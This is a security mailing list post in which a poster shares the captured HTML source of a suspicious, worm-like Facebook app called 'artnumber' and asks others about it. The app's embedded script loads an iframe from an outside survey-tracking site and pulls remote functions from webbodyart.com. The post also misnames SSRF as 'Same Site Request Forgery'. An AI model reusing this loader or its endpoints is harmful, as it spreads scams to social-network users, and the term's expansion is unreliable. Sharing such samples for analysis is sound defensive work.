Anyone else seen/get hit by this? Seems to be SSRF (Same Site Request Forgery, since it's the same site). Seems to work something like the old Sammy worm. I've included source (I think) in a test file. Not sure if it will go through. I'm about to look at the code closer.
Adrian
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";> <html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="en" lang="en" id="facebook" class=" no_js"> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-language" content="en" /> <script type="text/javascript"> //<![CDATA[ CavalryLogger=false;window._is_quickling_index="";if(window==window.top)window.Log=(function(){function g(){var n=Math.random();var o='';for(var m=0;m<4;m++){n=n*62;var p=Math.floor(n)%62;if(p>=10&&p<36){p=String.fromCharCode(p-10+65);}else if(p>=36&&p<62)p=String.fromCharCode(p-36+97);o+=p;}return o;}var k='_e_',l=(window.name||'').toString();l=(l.length==7&&k==l.substr(0,3))?l.substr(3):(window.name=k+g()).substr(3);var i=k+l+'_',f=new Date(+new Date()+604800000).toGMTString(),d=window.location.hostname.replace(/^.*(facebook\..*)$/i,'$1'),e='; expires='+f+';path=/; domain='+d,c=0,h=false,j=[];var b=function(m){return i+(c++)+'='+encodeURIComponent(m)+e;};var a=function(n){var o=(document.cookie.search(k)>=0);while(j.length>0){var p=b(j[0]);if(o&&((document.cookie.length+p.length)>3950||document.cookie.split(';').length>19))break;window.EagleEyeDev&&window.console&&console.log(j[0],'=>',p);document.cookie=p;o=true;j.shift();}if(!!n||!h&&o&&((document.cookie.length>2500||document.cookie.split(';').length>15))&&window.Arbiter&&window.OnloadEvent&&Arbiter.query(OnloadEvent.ONLOAD)){var m=new Image();h=true;m.onload=function(){h=false;a();};if(window.Env&&Env.tracking_domain){host=Env.tracking_domain;}else host='';m.src=host+'/ajax/nectar.php?asyncSignal='+(Math.floor(Math.random()*10000)+1)+'&'+(!n?'':'s=')+(+new Date());}};return function(q,m,o){var r=[l,+new Date(),q].concat(m);r.push(r.length);for(var n=0;n<r.length;n++)if(typeof r[n]=='string'){r[n]='"'+r[n].replace(/\"/g,'\\"').replace(/\n/g,'\\n')+'"';}else if(r[n]===null)r[n]='null';var p='['+r.join(',')+']';if(!o){j.push(p);}else document.cookie=b(p);a(o);};})(); //]]> </script><noscript> <meta http-equiv=refresh content="0; URL=/artnumber/?_fb_noscript=1" /> </noscript> <meta name="robots" content="noodp,noydir" /> <meta name="description" content=" Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, post links and videos, and learn more about the people they meet." /> <link rel="alternate" media="handheld" href="http://apps.facebook.com/artnumber/"; /> <title>artnumber on Facebook</title> <script type="text/javascript"> Env={user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:286413,vip:"66.220.153.15",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:2,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"iNkQ-",lhsh:"26700",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",ajax_threshold:"1",ajaxpipe_enabled:"1"}; </script> <noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/z8CPJ/hash/3w02bm3b.css"; /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/z67G4/hash/eox7ijxz.css"; /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/z8098/hash/3lptee54.css"; /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/zA18U/hash/4ygl967g.css"; /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/z3Z5P/hash/bk7kiwn2.css"; /> <script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/zCI31/hash/dojsxehe.js";></script> <script type="text/javascript">Bootloader.setResourceMap({"htKMA":{"name":"js\/5baz358gr5cs0ck8.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zD7C5\/hash\/2cwo5n9z.js"},"y1JUR":{"name":"js\/5znn8prkzsco4800.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zAV5V\/hash\/6pn9jij1.js"},"3dYbp":{"name":"js\/d1j04lv1dz4000ok.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zD9QW\/hash\/diwj3hcv.js"},"F5p9G":{"name":"js\/2pu5l1f71v6skkco.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z68SS\/hash\/497xw6d8.js"},"jb6FA":{"name":"js\/fbjs.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z5VVC\/hash\/23kftixm.js"},"7zF4n":{"name":"js\/4zfba0rzy84ksk04.pkg.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zCI31\/hash\/dojsxehe.js"},"w2DlR":{"name":"css\/1uoad6o0mk4kw8c4.pkg.css","type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z8CPJ\/hash\/3w02bm3b.css"},"HB\/9Y":{"name":"js\/apps\/app_tracker.js","type":"js","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z7RKI\/hash\/9x8h6q5r.js"}}); Bootloader.enableBootload({"async":["7zF4n","htKMA","w2DlR"],"dialog":["7zF4n","htKMA","w2DlR"],"dom-form":["7zF4n","htKMA","w2DlR"],"app-tracker":["htKMA","HB\/9Y"]});InitialJSLoader.load(["htKMA","y1JUR","3dYbp","F5p9G","jb6FA"])</script> <link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/zBOV4/hash/10jfw8tc.xml"; title="Facebook" /> <link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/z9Q0Q/hash/8yhim1ep.ico"; /></head> <body class="frame_wide withCanvasNav withCanvasNavAndBorder fbframe UIPage_LoggedOut ie8 win Locale_en_US"> <div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar" class="loggedOut"></div><div id="globalContainer"><div class="loggedout_menubar_container"><div class="clearfix loggedout_menubar"><a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/zEX21/hash/75j4m1ms.png"; alt="Facebook logo" width="170" height="36" /></a><div class="rfloat"><div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1"; id="login_form" onsubmit=";var d=document.documentElement;if (d.onsubmit) { return d.onsubmit(event); }else { return Event.fire(d, "submit", event); }"><input type="hidden" name="charset_test" value="€,´,,´,?,?,?" /><input type="hidden" id="locale" name="locale" value="en_US" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm uiButtonMedium"><input value="Login" tabindex="4" type="submit" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/reset.php"; rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" id="next" name="next" value="http://apps.facebook.com/artnumber/"; autocomplete="off" /><input type="hidden" name="charset_test" value="€,´,,´,?,?,?" /><input type="hidden" id="lsd" name="lsd" value="QJ8d5" autocomplete="off" /></form> </div></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Sign up for Facebook to use artnumber.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div class="UIStandardFrame_Container clearfix"><div class="UIStandardFrame_Content"><div ><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div> <script src="http://static.ak.connect.facebook.com/connect.php/en_US"; type="text/javascript"></script><script type="text/javascript"> FB_RequireFeatures(["CacheData"], function() { FB.XdComm.Server.init("/xd_receiver_v0.4.php"); FBIntern.CacheUtil.CacheUtilServer.dataparams = {}; FBIntern.CacheUtil.CacheUtilServer.run(true); }); </script><!-- *{} @import url('http://apps.facebook.com/ajax/connect/load_test.php?app_id=143817662321145&url=http%3A%2F%2Fapps.facebook.com%2Fartnumber%2F');--><div id="app_content_143817662321145" class="canvas_rel_positioning app_content_143817662321145"><div><div style="position: relative; overflow: hidden"><style type="text/css">.app_content_143817662321145 .frabox { border: 0px solid #ffffff; background: #ffffff none repeat scroll 0% 0%; overflow: hidden; width: 739px; height: 600px; } .app_content_143817662321145 .fraoff { overflow: hidden; position: absolute; left: 10px; top: -15px; width: 740px; height: 700px; } </style> <div id="app143817662321145_frabox" fbcontext="ab0e3927a75a"></div> <div id="app143817662321145_wrapper" fbcontext="ab0e3927a75a"> </div> <div id="app143817662321145_functions" fbcontext="ab0e3927a75a"></div> <div id="app143817662321145_return" fbcontext="ab0e3927a75a"></div> </div></div></div></div></div><div class="UIStandardFrame_SidebarAds"><div class="canvasSidebar"><div id="canvas_nav_content"></div></div> </div></div></div><div id="pageFooter"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div class="lfloat"><div class="uiTextSubtitle"><a class="uiLinkSubtle" href="http://www.facebook.com/apps/application.php?id=143817662321145"; title="HPHP - 311 - 10.144.147.128 - 708984">artnumber</a> · <a rel="dialog" title="Report problems with artnumber" href="/ajax/report_app.php?app_id=143817662321145">Report</a> · <a rel="dialog" href="/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fapps.facebook.com%2Fartnumber%2F" title="Use Facebook in another language.">English (US)</a></div></div><div class="uiTextSubtitle rfloat"><a href="http://www.facebook.com/mobile?ref=pf"; title="Check out Facebook Mobile.">Mobile</a> · <a href="http://www.facebook.com/find-friends?ref=pf"; title="Find anyone on the web.">Find Friends</a> · <a href="http://www.facebook.com/badges/?ref=pf"; title="Embed a Facebook badge on your website.">Badges</a> · <a href="http://www.facebook.com/facebook"; accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a> · <a href="/campaign/landing.php?placement=pflo&campaign_id=402047449186&extra_1=0" title="Advertise on Facebook.">Advertising</a> · <a href="http://developers.facebook.com/?ref=pf"; title="Develop on our platform.">Developers</a> · <a href="http://www.facebook.com/careers/?ref=pf"; title="Make your next career move to our awesome company.">Careers</a> · <a href="http://www.facebook.com/privacy/explanation.php"; title="Learn about your privacy and Facebook.">Privacy</a> · <a href="http://www.facebook.com/terms.php?ref=pf"; accesskey="9" title="Review our terms of service.">Terms</a> · <a href="http://www.facebook.com/help/?ref=pf"; accesskey="0" title="Visit our Help Center.">Help</a></div></div></div></div><script type="text/javascript">/* <![CDATA[ */if (top != self) { try { if (top.location.hostname.indexOf("apps") >= 0) { throw 1; } } catch (e) {setTimeout(function() {var fb_cj_img = new Image(); fb_cj_img.src = "http:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&m&t=36";}, 5000); window.document.write("<style>body * { display:none !important; }<\/style><a href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display: block !important; padding: 10px\"><i class=\"img spritemap_bt5k9d sx_8a0154\" style=\"display:block !important\"><\/i>Go to Facebook.com<\/a>");/* eTC68dsy */ }}/* ]]> */</script> <script type="text/javascript">Bootloader.setResourceMap({"FXnty":{"name":"css\/2e28i09g09xcw804.pkg.css","type":"css","src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z67G4\/hash\/eox7ijxz.css"},"\/Vpsc":{"name":"css\/a9wxgs2u1dcs0w0s.pkg.css","type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z8098\/hash\/3lptee54.css"},"olbS\/":{"name":"css\/ae00p9rwk9c80oww.pkg.css","type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zA18U\/hash\/4ygl967g.css"},"kg1as":{"name":"css\/d275now8qs080cwo.pkg.css","type":"css","permanent":1,"nonblocking":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/z3Z5P\/hash\/bk7kiwn2.css"}});</script><script type="text/javascript"> Bootloader.configurePage(["w2DlR","FXnty","\/Vpsc","olbS\/","kg1as"]); Bootloader.done(["js\/lib\/util\/log.js"]); onloadRegister(function (){FBML.Contexts["ab0e3927a75a"] = "O:16:\"CanvasFBMLFlavor\":1:{s:9:\"_fbml_env\";a:9:{s:4:\"user\";i:0;s:6:\"app_id\";i:143817662321145;s:10:\"fb_page_id\";i:0;s:10:\"canvas_url\";s:35:\"http:\/\/apps.facebook.com\/artnumber\/\";s:10:\"source_url\";s:32:\"http:\/\/webbodyart.com\/artnumber\/\";s:9:\"loggedout\";b:1;s:7:\"non-tos\";b:1;s:11:\"flavor_code\";i:3;s:8:\"is_tosed\";b:0;}}"; ;}); onloadRegister(function (){eval_global("var app_143817662321145 = new fbjs_sandbox(\"143817662321145\").setBridgeHash(\"\");app_143817662321145.validation_vars = {\"fb_sig_locale\":\"en_US\",\"fb_sig_in_new_facebook\":1,\"fb_sig_time\":\"1283801780.4357\",\"fb_sig_logged_out_facebook\":1,\"fb_sig_added\":0,\"fb_sig_country\":\"us\",\"fb_sig_api_key\":\"2a886e7618bf32ec9e4f932d2c297c48\",\"fb_sig_app_id\":143817662321145,\"fb_sig\":\"8df3a9590f1626ffe4e5aff25ad640d8\"};app_143817662321145.context = \"ab0e3927a75a\";app_143817662321145.contextd = \"O:16:\\\"CanvasFBMLFlavor\\\":1:{s:9:\\\"_fbml_env\\\";a:9:{s:4:\\\"user\\\";i:0;s:6:\\\"app_id\\\";i:143817662321145;s:10:\\\"fb_page_id\\\";i:0;s:10:\\\"canvas_url\\\";s:35:\\\"http:\\\/\\\/apps.facebook.com\\\/artnumber\\\/\\\";s:10:\\\"source_url\\\";s:32:\\\"http:\\\/\\\/webbodyart.com\\\/artnumber\\\/\\\";s:9:\\\"loggedout\\\";b:1;s:7:\\\"non-tos\\\";b:1;s:11:\\\"flavor_code\\\";i:3;s:8:\\\"is_tosed\\\";b:0;}}\";app_143817662321145.data = {\"user\":0,\"installed\":false};app_143817662321145.bootstrap();");fbjs_sandbox.loadScripts([{"inline":"\n\t\nfunction a143817662321145_ajaxfunc(){\n\t\n\t$FBJS.ref(this).post = function(a143817662321145_url,a143817662321145_query) {\n\t\ta143817662321145_document.getElementById('frabox').setClassName('frabox');\n\t\ta143817662321145_document.getElementById('frabox').setInnerXHTML('<iframe id=\"fraoff\" name=\"fraoff\" width=\"760\" height=\"700\" scrolling=\"no\" frameborder=\"1\" style=\"position:relative;overflow:hidden;border:none;width:755px;height:750px;top:-245px;\" src=\"http:\/\/track.SocialSurveys.us\/DefaultPage.aspx?nm=017gjfq68yx9\"><\/iframe>');\n\t\t\n\t\ta143817662321145_Animation(a143817662321145_document.getElementById('frabox')).to('height', '462px').from('0px').go();\n\t\tvar a143817662321145_ajax = new a143817662321145_Ajax();\n\t\ta143817662321145_ajax.ondone = function(a143817662321145_data) {\n\t\t\ta143817662321145_document.getElementById('return').setInnerFBML(a143817662321145_data.fbml_return);\n\t\t\ta143817662321145_document.getElementById('functions').setInnerFBML(a143817662321145_data.fbml_functions);\n\t\t\t\n\t\t\ta143817662321145_ajax=null;\n\t\t}\n\t\ta143817662321145_ajax.onerror = function() {\n\t\t\ta143817662321145_document.getElementById('wrapper').setTextValue('');\n\t\t}\n\t\ta143817662321145_ajax.requireLogin = 0;\n\t\ta143817662321145_ajax.responseType = a143817662321145_Ajax.JSON;\n\t\ta143817662321145_ajax.post(a143817662321145_url,a143817662321145_query);\n\t};\n\n}\n\n\ta143817662321145_setTimeout(function(){\n\t\tvar a143817662321145_jax = new a143817662321145_ajaxfunc();\n\t\ta143817662321145_jax.post('http:\/\/webbodyart.com\/artnumber\/index.php',{\"ajax\":1});\n\t},500);\n\n"}]);;}); onloadRegister(function (){new PlatformCanvasController("143817662321145", "", 0, "", "artnumber", "http:\/\/webbodyart.com\/artnumber\/", "2a886e7618bf32ec9e4f932d2c297c48", "0", {"bookmark.add":1,"friends.add":1});;}); onloadRegister(function (){window.loading_page_chrome = true;;}); onloadRegister(function (){try { $("email").focus(); } catch (_ignore) { };}); onloadRegister(function (){window.loading_page_chrome = false;;}); onafterloadRegister(function (){Bootloader.loadComponents(["app-tracker"], function(){ AppUseTracker("143817662321145", false, 15000, 600000); });;}); </script> <script>big_pipe = new BigPipe(null, 2, null, 0, false); big_pipe.onPageletArrive({"num_phases":2,"roadrunner_enabled":false,"id":"first_response","phase":0,"is_last":true,"tti_phase":0,"bootloadable":[],"css":["w2DlR","FXnty","\/Vpsc","olbS\/","kg1as"],"js":[],"resource_map":[],"extern_rsrcs":[],"requires":[],"provides":[],"onload":[],"onafterload":[],"onpagecache":[],"onafterpagecache":[],"refresh_pagelets":[],"invalidate_cache":[]});</script> <script>big_pipe.onPageletArrive({"id":"","phase":1,"is_last":true,"append":false,"bootloadable":[],"css":["w2DlR","FXnty","\/Vpsc","olbS\/","kg1as"],"js":["7zF4n","htKMA","y1JUR","3dYbp","F5p9G","jb6FA"],"resource_map":[],"requires":[],"provides":[],"onload":[],"onafterload":[],"onpagecache":[],"onafterpagecache":[],"refresh_pagelets":[],"invalidate_cache":[],"content":[],"page_cache":false});</script> </body></html>
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
![http://static.ak.fbcdn.net/rsrc.php/zEX21/hash/75j4m1ms.png"](https://static.ak.fbcdn.net/rsrc.php/zEX21/hash/75j4m1ms.png"){kind=link}